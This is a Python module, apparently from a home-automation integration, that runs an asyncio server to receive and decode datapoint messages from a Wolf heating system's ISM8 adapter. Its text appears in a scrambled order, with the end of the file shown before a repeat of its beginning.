53: ('BM1', 'Stoerung', 'DPT_Switch', False, ''),
54: ('BM1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
55: ('BM1', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
56: ('BM1', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
57: ('BM1', 'Programmwahl Heizkreis', 'DPT_HVACMode', True, ''),
58: ('BM1', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
59: ('BM1', 'Heizkreis Zeitprogramm 1', 'DPT_Switch', True, ''),
60: ('BM1', 'Heizkreis Zeitprogramm 2', 'DPT_Switch', True, ''),
61: ('BM1', 'Heizkreis Zeitprogramm 3', 'DPT_Switch', True, ''),
62: ('BM1', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
63: ('BM1', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
64: ('BM1', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
65: ('BM1', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
66: ('BM1', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
67: ('BM2', 'Stoerung', 'DPT_Switch', False, ''),
68: ('BM2', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
69: ('BM2', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
70: ('BM2', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
71: ('BM2', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
72: ('BM2', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
73: ('BM2', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
74: ('BM2', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
75: ('BM2', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
76: ('BM2', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
77: ('BM2', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
78: ('BM2', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
79: ('BM2', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
80: ('BM3', 'Stoerung', 'DPT_Switch', False, ''),
81: ('BM3', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
82: ('BM3', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
83: ('BM3', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
84: ('BM3', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
85: ('BM3', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
86: ('BM3', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
87: ('BM3', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
88: ('BM3', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
89: ('BM3', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
90: ('BM3', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
91: ('BM3', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
92: ('BM3', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
93: ('BM4', 'Stoerung', 'DPT_Switch', False, ''),
94: ('BM4', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
95: ('BM4', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
96: ('BM4', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
97: ('BM4', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
98: ('BM4', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
99: ('BM4', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
100: ('BM4', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
101: ('BM4', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
102: ('BM4', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
103: ('BM4', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
104: ('BM4', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
105: ('BM4', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
106: ('KM', 'Stoerung', 'DPT_Switch', False, ''),
107: ('KM', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
108: ('KM', 'Gesamtmodulationsgrad', 'DPT_Scaling', False, '%'),
109: ('KM', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
110: ('KM', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
111: ('KM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
112: ('KM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
113: ('KM', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
114: ('MM1', 'Stoerung', 'DPT_Switch', False, ''),
115: ('MM1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
116: (
'MM1', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
117: ('MM1', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
118: ('MM1', 'Status Ausgang A1', 'DPT_Enable', False, ''),
119: ('MM1', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
120: ('MM1', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
121: ('MM2', 'Stoerung', 'DPT_Switch', False, ''),
122: ('MM2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
123: (
'MM2', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
124: ('MM2', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
125: ('MM2', 'Status Ausgang A1', 'DPT_Enable', False, ''),
126: ('MM2', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
127: ('MM2', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
128: ('MM3', 'Stoerung', 'DPT_Switch', False, ''),
129: ('MM3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
130: (
'MM3', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
131: ('MM3', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
132: ('MM3', 'Status Ausgang A1', 'DPT_Enable', False, ''),
133: ('MM3', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
134: ('MM3', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
135: ('SM', 'Stoerung', 'DPT_Switch', False, ''),
136: ('SM', 'Warmwassertemperatur Solar 1', 'DPT_Value_Temp', False,
'C'),
137: ('SM', 'Temperatur Kollektor 1', 'DPT_Value_Temp', False, 'C'),
138: ('SM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
139: ('SM', 'Eingang E2 (Durchfluss)', 'DPT_Value_Volume_Flow', False,
'l/h'),
140: ('SM', 'Eingang E3', 'DPT_Value_Temp', False, 'C'),
141: ('SM', 'Status Solarkreispumpe SKP1', 'DPT_Switch', False, ''),
142: ('SM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
143: ('SM', 'Status Ausgang A2', 'DPT_Enable', False, ''),
144: ('SM', 'Status Ausgang A3', 'DPT_Enable', False, ''),
145: ('SM', 'Status Ausgang A4', 'DPT_Enable', False, ''),
146: ('SM', 'Durchfluss', 'DPT_Value_Volume_Flow', False, 'l/h'),
147: ('SM', 'aktuelle Leistung', 'DPT_Power', False, 'kW'),
148: ('CWL', 'Stoerung', 'DPT_Switch', False, ''),
149: ('CWL', 'Programm', 'DPT_DHWMode', True, ''),
150: ('CWL', 'Zeitprogramm 1', 'DPT_Switch', True, ''),
151: ('CWL', 'Zeitprogramm 2', 'DPT_Switch', True, ''),
152: ('CWL', 'Zeitprogramm 3', 'DPT_Switch', True, ''),
153: ('CWL', 'Intensivlueftung AN_AUS', 'DPT_Switch', True, ''),
154: ('CWL', 'Intensivlueftung Startdatum', 'DPT_Date', True, ''),
155: ('CWL', 'Intensivlueftung Enddatum', 'DPT_Date', True, ''),
156: ('CWL', 'Intensivlueftung Startzeit', 'DPT_TimeOfDay', True, ''),
157: ('CWL', 'Intensivlueftung Endzeit', 'DPT_TimeOfDay', True, ''),
158: ('CWL', 'Zeitw. Feuchteschutz AN_AUS', 'DPT_Switch', True, ''),
159: ('CWL', 'Zeitw. Feuchteschutz Startdatum', 'DPT_Date', True, ''),
160: ('CWL', 'Zeitw. Feuchteschutz Enddatum', 'DPT_Date', True, ''),
161: (
'CWL', 'Zeitw. Feuchteschutz Startzeit', 'DPT_TimeOfDay', True,
''),
162: (
'CWL', 'Zeitw. Feuchteschutz Endzeit', 'DPT_TimeOfDay', True, ''),
163: ('CWL', 'Lueftungsstufe', 'DPT_Scaling', False, '%'),
164: ('CWL', 'Ablufttemperatur', 'DPT_Value_Temp', False, 'C'),
165: ('CWL', 'Frischlufttemperatur', 'DPT_Value_Temp', False, 'C'),
166: ('CWL', 'Durchsatz Zuluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
167: ('CWL', 'Durchsatz Abluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
168: ('CWL', 'Bypass Initialisierung', 'DPT_Bool', False, ''),
169: ('CWL', 'Bypass oeffnet_offen', 'DPT_Bool', False, ''),
170: ('CWL', 'Bypass schliesst_geschlossen', 'DPT_Bool', False, ''),
171: ('CWL', 'Bypass Fehler', 'DPT_Bool', False, ''),
172: ('CWL', 'Frost Status: Init_Warte', 'DPT_Bool', False, ''),
173: ('CWL', 'Frost Status: Kein Frost', 'DPT_Bool', False, ''),
174: ('CWL', 'Frost Status: Vorwaermer', 'DPT_Bool', False, ''),
175: ('CWL', 'Frost Status: Fehler', 'DPT_Bool', False, ''),
176: ('BWL', 'Stoerung', 'DPT_Switch', False, ''),
177: ('BWL', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
178: ('BWL', 'Heizleistung', 'DPT_Power', False, 'W'),
179: ('BWL', 'Kuehlleistung', 'DPT_Power', False, 'W'),
180: ('BWL', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
181: ('BWL', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
182: ('BWL', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
183: ('BWL', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
184: ('BWL', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
185: ('BWL', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
186: ('BWL', 'Status Aux-Pumpe', 'DPT_Switch', False, ''),
187: ('BWL', '3W-Umschaltventil HZ_WW', 'DPT_OpenClose', False, ''),
188: ('BWL', '3W-Umschaltventil HZ_K', 'DPT_OpenClose', False, ''),
189: ('BWL', 'Status E-Heizung', 'DPT_Switch', False, ''),
190: ('BWL', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
191: ('BWL', 'Leistungsaufnahme', 'DPT_Power', False, 'W'),
192: ('CWL', 'Filterwarnung aktiv', 'DPT_Switch', False, '-'),
193: ('CWL', 'Filterwarnung zuruecksetzen', 'DPT_Switch', True, '-'),
194: ('BM1', '1x Warmwasserladung (gobal)', 'DPT_Switch', True, '-'),
195: ('SM', 'Tagesertrag', 'DPT_ActiveEnergy', False, 'Wh'),
196: ('SM', 'Gesamtertrag', 'DPT_ActiveEnergy_kWh', False, 'kWh'),
197: ('HG1', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
198: ('HG1', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
199: ('HG1', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
200: ('HG2', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
201: ('HG2', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
202: ('HG2', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
203: ('HG3', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
204: ('HG3', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
205: ('HG3', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
206: ('HG4', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
207: ('HG4', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
208: ('HG4', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
209: ('KM', 'Gesamtmodulationsgradvorgabe', 'DPT_Scaling', True, '%'),
210: ('KM', 'Sammlertemperaturvorgabe', 'DPT_Value_Temp', True, 'C')
}
@staticmethod
def get_device(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_DEVICE]
else:
return None
@staticmethod
def get_name(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_NAME]
else:
return None
@staticmethod
def get_type(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
else:
return None
@staticmethod
def get_unit(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_UNIT]
else:
return None
@staticmethod
def get_all_sensors():
""" returns pointer all possible values of ISM8 datapoints """
return Ism8.DATAPOINTS
def factory(self):
"""
returns reference to itself for using in protocol_factory with
create_server
"""
return self
def connection_made(self, transport):
""" is called as soon as an ISM8 connects to server """
_peername = transport.get_extra_info('peername')
self._LOGGER.info("Connection from ISM8: %s", _peername)
self._transport = transport
self._connected = True
def data_received(self, data):
""" is called whenever data is ready """
_header_ptr = 0
msg_length = 0
self._LOGGER.debug('Raw data received: %s', data)
while _header_ptr < len(data):
_header_ptr = data.find(Ism8.ISM_HEADER, _header_ptr)
if _header_ptr >= 0:
if len(data[_header_ptr:]) >= 9:
# smallest processable data:
# hdr plus 5 bytes=>at least 9 bytes
msg_length = 256 * data[_header_ptr + 4] + data[
_header_ptr + 5]
# msg_length comes in bytes 4 and 5
else:
msg_length = len(data) + 1
# 2 possible outcomes here: Buffer is to short for message=>abort
# buffer is larger => than msg: process 1 message,
# then continue loop
if len(data) < _header_ptr + msg_length:
self._LOGGER.debug(
"Buffer shorter than expected / broken Message.")
self._LOGGER.debug("Discarding: %s ", data[_header_ptr:])
# setting Ptr to end of data will end loop
_header_ptr = len(data)
else:
# send ACK to ISM8 according to API: ISM Header,
# then msg-length(17), then ACK w/ 2 bytes from original msg
ack_msg = bytearray(Ism8.ISM_HEADER)
ack_msg.append(0x00)
ack_msg.append(0x11)
ack_msg.extend(Ism8.ISM_CONN_HEADER)
ack_msg.extend(Ism8.ISM_ACK)
ack_msg[12] = data[_header_ptr + 12]
ack_msg[13] = data[_header_ptr + 13]
self._LOGGER.debug('Sending ACK: %s ', ack_msg)
self._transport.write(ack_msg)
self.process_msg(
data[_header_ptr + 10:_header_ptr + msg_length])
# process message without header (first 10 bytes)
_header_ptr += msg_length
# prepare to get next message; advance Ptr to next Msg
def process_msg(self, msg):
"""
Processes received datagram(s) according to ISM8 API specification
into message length, command, values delivered
"""
max_dp = msg[4] * 256 + msg[5]
# number of DATAPOINTS are coded into bytes 4 and 5 of message
i = 0
# byte counter
dp_nbr = 1
# datapoint counter
while dp_nbr <= max_dp:
self._LOGGER.debug('DP {0:d} / {1:d} in datagram:'.format(
dp_nbr, max_dp))
dp_id = msg[i + 6] * 256 + msg[i + 7]
# dp_command = msg[i + 8]
# to be implemented for writing values to ISM8
dp_length = msg[i + 9]
dp_raw_value = bytearray(msg[i + 10:i + 10 + dp_length])
self._LOGGER.debug('Processing DP-ID %s, %s bytes: message: %s',
dp_id, dp_length, dp_raw_value)
self.decode_datapoint(dp_id, dp_length, dp_raw_value)
# now advance byte counter and datapoint counter
dp_nbr += 1
i = i + 10 + dp_length
def decode_datapoint(self, dp_id, length, raw_bytes):
"""
decodes a single value according to API;
receives raw bytes from network and
decodes them according to API data type
"""
result = 0
for single_byte in raw_bytes:
result = result * 256 + int(single_byte)
if dp_id not in Ism8.DATAPOINTS:
self._LOGGER.error("unknown datapoint: %s, data:%s",
dp_id, result)
return
dp_type = Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
if (length == 1) and dp_type in ("DPT_Switch",
"DPT_Bool",
"DPT_Enable",
"DPT_OpenClose"):
# take 1st bit and cast to Bool
self._dp_values.update({dp_id: bool(result & 1)})
elif (length == 1) and (dp_type == "DPT_HVACMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Comfort'})
elif result == 2:
self._dp_values.update({dp_id: 'Standby'})
elif result == 3:
self._dp_values.update({dp_id: 'Economy'})
elif result == 4:
self._dp_values.update({dp_id: 'Building Protection'})
elif (length == 1) and (dp_type == "DPT_Scaling"):
# take byte value and multiply by 100/255
self._dp_values.update({dp_id: 100 / 255 * result})
elif (length == 1) and (dp_type == "DPT_DHWMode"):
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'LegioProtect'})
elif result == 2:
self._dp_values.update({dp_id: 'Normal'})
elif result == 3:
self._dp_values.update({dp_id: 'Reduced'})
elif result == 4:
self._dp_values.update({dp_id: 'Off'})
elif (length == 1) and (dp_type == "DPT_HVACContrMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Heat'})
elif result == 2:
self._dp_values.update({dp_id: 'Morning Warmup'})
elif result == 3:
self._dp_values.update({dp_id: 'Cool'})
elif result == 4:
self._dp_values.update({dp_id: 'Night Purge'})
elif result == 5:
self._dp_values.update({dp_id: 'Precool'})
elif result == 6:
self._dp_values.update({dp_id: 'Off'})
elif result == 7:
self._dp_values.update({dp_id: 'Test'})
elif result == 8:
self._dp_values.update({dp_id: 'Emergency Heat'})
elif result == 9:
self._dp_values.update({dp_id: 'Fan Only'})
elif result == 10:
self._dp_values.update({dp_id: 'Free Cool'})
elif result == 11:
self._dp_values.update({dp_id: 'Ice'})
elif result == 12:
self._dp_values.update({dp_id: 'Maximum Heating Mode'})
elif result == 13:
self._dp_values.update({dp_id: 'Economic Heat/Cool Mode'})
elif result == 14:
self._dp_values.update({dp_id: 'Dehumidification'})
elif result == 15:
self._dp_values.update({dp_id: 'Calibration Mode'})
elif result == 16:
self._dp_values.update({dp_id: 'Emergency Cool Mode'})
elif result == 17:
self._dp_values.update({dp_id: 'Emergency Steam Mode'})
elif result == 20:
self._dp_values.update({dp_id: 'NoDem'})
elif (length == 2) and (dp_type in ("DPT_Value_Temp",
"DPT_Value_Tempd",
"DPT_Tempd",
"DPT_Value_Pres",
"DPT_Power",
"DPT_Value_Volume_Flow"
)):
_sign = (result & 0b1000000000000000) >> 15
_exponent = (result & 0b0111100000000000) >> 11
_mantisse = result & 0b0000011111111111
self._LOGGER.debug(
'binary format {0:b} -> s:{1:b} , m:{2:b} , e:{3:b}'
.format(result, _sign, _mantisse, _exponent))
if _sign == 1:
_mantisse = -(~(_mantisse - 1) & 0x07ff)
self._dp_values.update(
{dp_id: (0.01 * (2 ** _exponent) * _mantisse)})
elif (length == 4) and (dp_type in ("DPT_ActiveEnergy",
"DPT_ActiveEnergy_kWh"
)):
self._dp_values.update({dp_id: result})
else:
self._LOGGER.error('datatype not implemented: %s ', dp_type)
return
if dp_id in self._dp_values.keys():
self._LOGGER.debug('decoded DP %s : %s = %s\n',
dp_id, Ism8.DATAPOINTS[dp_id],
self._dp_values[dp_id])
else:
self._LOGGER.error('could not decode DP %s : %s\n',
dp_id, Ism8.DATAPOINTS[dp_id])
def connection_lost(self, exc):
"""
Is called when connection ends. closes socket.
"""
self._LOGGER.debug('ISM8 closed the connection.Stopping')
self._connected = False
self._transport.close()
def read(self, dp_id):
"""
Returns sensor value from private array of sensor-readings
"""
if dp_id in self._dp_values.keys():
return self._dp_values[dp_id]
else:
return None
if __name__ == "__main__":
_LOGGER = logging.getLogger(__name__)
logging.basicConfig()
_LOGGER.setLevel(logging.DEBUG)
# for testing purposes only, relies on debug output
myProtocol = Ism8()
for keys, values in myProtocol.get_all_sensors().items():
print("%s: %s\n" % (keys, values))
_eventloop = asyncio.get_event_loop()
coro = _eventloop.create_server(myProtocol.factory, '', 12004)
_server = _eventloop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
_LOGGER.debug('Waiting for ISM8 connection on %s',
_server.sockets[0].getsockname())
_eventloop.run_forever()
| 51.9375 | 80 | 0.537552 | """
Module for gathering info from Wolf Heating System via ISM8 adapter
"""
import logging
import asyncio
class Ism8(asyncio.Protocol):
"""
This protocol class is invoked to listen to message from ISM8 module and
feed data into internal data array
"""
ISM_HEADER = b'\x06\x20\xf0\x80'
ISM_CONN_HEADER = b'\x04\x00\x00\x00'
ISM_ACK = b'\xF0\x86\x00\x00\x00\x00\x00'
ISM_POLL = b'\x06\x20\xF0\x80\x00\x16\x04\x00\x00\x00\xF0\xD0'
# constant byte arrays for creating ISM8 network messages
DP_DEVICE = 0
# index of Wolf ISM main device name
DP_NAME = 1
# index of datapoint name
DP_TYPE = 2
# index of datapoint type (as described in Wolf API)
DP_RW = 3
# index of R/W-flag (writing not implemented so far)
DP_UNIT = 4
# index of unit description, if applicable
DATAPOINTS = {
1: ('HG1', 'Stoerung', 'DPT_Switch', False, ''),
2: ('HG1', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
3: ('HG1', 'Brennerleistung', 'DPT_Scaling', False, '%'),
4: ('HG1', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
5: ('HG1', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
6: ('HG1', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
7: ('HG1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
8: ('HG1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
9: ('HG1', 'Status Brenner', 'DPT_Switch', False, ''),
10: ('HG1', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
11: ('HG1', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
12: ('HG1', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
13: ('HG1', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
14: ('HG2', 'Stoerung', 'DPT_Switch', False, ''),
15: ('HG2', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
16: ('HG2', 'Brennerleistung', 'DPT_Scaling', False, '%'),
17: ('HG2', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
18: ('HG2', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
19: ('HG2', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
20: ('HG2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
21: ('HG2', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
22: ('HG2', 'Status Brenner', 'DPT_Switch', False, ''),
23: ('HG2', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
24: ('HG2', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
25: ('HG2', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
26: ('HG2', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
27: ('HG3', 'Stoerung', 'DPT_Switch', False, ''),
28: ('HG3', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
29: ('HG3', 'Brennerleistung', 'DPT_Scaling', False, '%'),
30: ('HG3', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
31: ('HG3', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
32: ('HG3', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
33: ('HG3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
34: ('HG3', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
35: ('HG3', 'Status Brenner', 'DPT_Switch', False, ''),
36: ('HG3', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
37: ('HG3', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
38: ('HG3', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
39: ('HG3', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
40: ('HG4', 'Stoerung', 'DPT_Switch', False, ''),
41: ('HG4', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
42: ('HG4', 'Brennerleistung', 'DPT_Scaling', False, '%'),
43: ('HG4', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
44: ('HG4', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
45: ('HG4', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
46: ('HG4', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
47: ('HG4', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
48: ('HG4', 'Status Brenner', 'DPT_Switch', False, ''),
49: ('HG4', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
50: ('HG4', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
51: ('HG4', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
52: ('HG4', 'Anlagendruck', 'DPT_Value_Pres', False, 'a'),
53: ('BM1', 'Stoerung', 'DPT_Switch', False, ''),
54: ('BM1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
55: ('BM1', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
56: ('BM1', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
57: ('BM1', 'Programmwahl Heizkreis', 'DPT_HVACMode', True, ''),
58: ('BM1', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
59: ('BM1', 'Heizkreis Zeitprogramm 1', 'DPT_Switch', True, ''),
60: ('BM1', 'Heizkreis Zeitprogramm 2', 'DPT_Switch', True, ''),
61: ('BM1', 'Heizkreis Zeitprogramm 3', 'DPT_Switch', True, ''),
62: ('BM1', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
63: ('BM1', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
64: ('BM1', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
65: ('BM1', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
66: ('BM1', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
67: ('BM2', 'Stoerung', 'DPT_Switch', False, ''),
68: ('BM2', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
69: ('BM2', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
70: ('BM2', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
71: ('BM2', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
72: ('BM2', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
73: ('BM2', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
74: ('BM2', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
75: ('BM2', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
76: ('BM2', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
77: ('BM2', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
78: ('BM2', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
79: ('BM2', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
80: ('BM3', 'Stoerung', 'DPT_Switch', False, ''),
81: ('BM3', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
82: ('BM3', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
83: ('BM3', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
84: ('BM3', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
85: ('BM3', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
86: ('BM3', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
87: ('BM3', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
88: ('BM3', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
89: ('BM3', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
90: ('BM3', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
91: ('BM3', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
92: ('BM3', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
93: ('BM4', 'Stoerung', 'DPT_Switch', False, ''),
94: ('BM4', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
95: ('BM4', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
96: ('BM4', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
97: ('BM4', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
98: ('BM4', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
99: ('BM4', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
100: ('BM4', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
101: ('BM4', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
102: ('BM4', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
103: ('BM4', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
104: ('BM4', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
